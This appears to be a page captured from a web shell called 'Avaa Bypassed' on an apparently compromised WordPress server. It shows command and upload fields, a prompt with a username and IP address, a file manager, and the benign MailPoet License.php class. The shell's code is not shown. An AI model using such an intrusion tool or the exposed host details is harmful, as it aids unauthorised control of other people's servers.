[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.117.152.156: ~ $
<?php

namespace MailPoet\Util\License;

if (!defined('ABSPATH')) exit;


class License {
  const FREE_PREMIUM_SUBSCRIBERS_LIMIT = 1000;

  public static function getLicense($license = false) {
    if (!$license) {
      $license = defined('MAILPOET_PREMIUM_LICENSE') ?
      MAILPOET_PREMIUM_LICENSE :
      false;
    }
    return $license;
  }

  public function hasLicense(): bool {
    return (bool)self::getLicense();
  }
}

Filemanager

Name Type Size Permission Actions
Features Folder 0755
License.php File 430 B 0644
index.php File 0 B 0644